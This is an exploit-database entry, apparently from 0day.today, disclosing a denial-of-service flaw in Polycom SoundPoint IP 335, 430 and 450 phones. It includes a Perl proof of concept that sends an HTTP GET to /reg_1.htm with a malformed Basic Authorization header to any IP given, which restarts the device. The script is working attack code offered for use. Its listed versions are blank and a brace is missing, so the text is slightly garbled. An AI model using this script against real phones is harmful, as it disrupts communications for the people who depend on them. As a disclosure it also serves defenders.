Polycom SoundPoint IP Devices Denial Of Service

ID 1337DAY-ID-15448
Type zdt
Reporter pawel gawinek
Modified 2011-01-29T00:00:00


Exploit for hardware platform in category dos / poc

                                            Polycom SoundPoint IP devices (IP phones) are vulnerable to Denial of
Service attacks. Sending HTTP GET request with broken Authorization
header effect a device restart after ~60 seconds.
It was tested on:
SoundPoint IP 335 (Version:
SoundPoint IP 430 (Version:
SoundPoint IP 450 (Version:
Proof Of Concept:
use IO::Socket;
use strict;
use warnings;
if (!$ARGV[0]) {
         print "Usage: $0 [IP]\n";
my $socket = IO::Socket::INET->new(
         Proto => "tcp",
         PeerAddr => "$ARGV[0]",
         PeerPort => "80") || die "Error $!";
print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic\r\n\r\n";
#print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic \0\r\n\r\n";

#  0day.today [2018-04-03]  #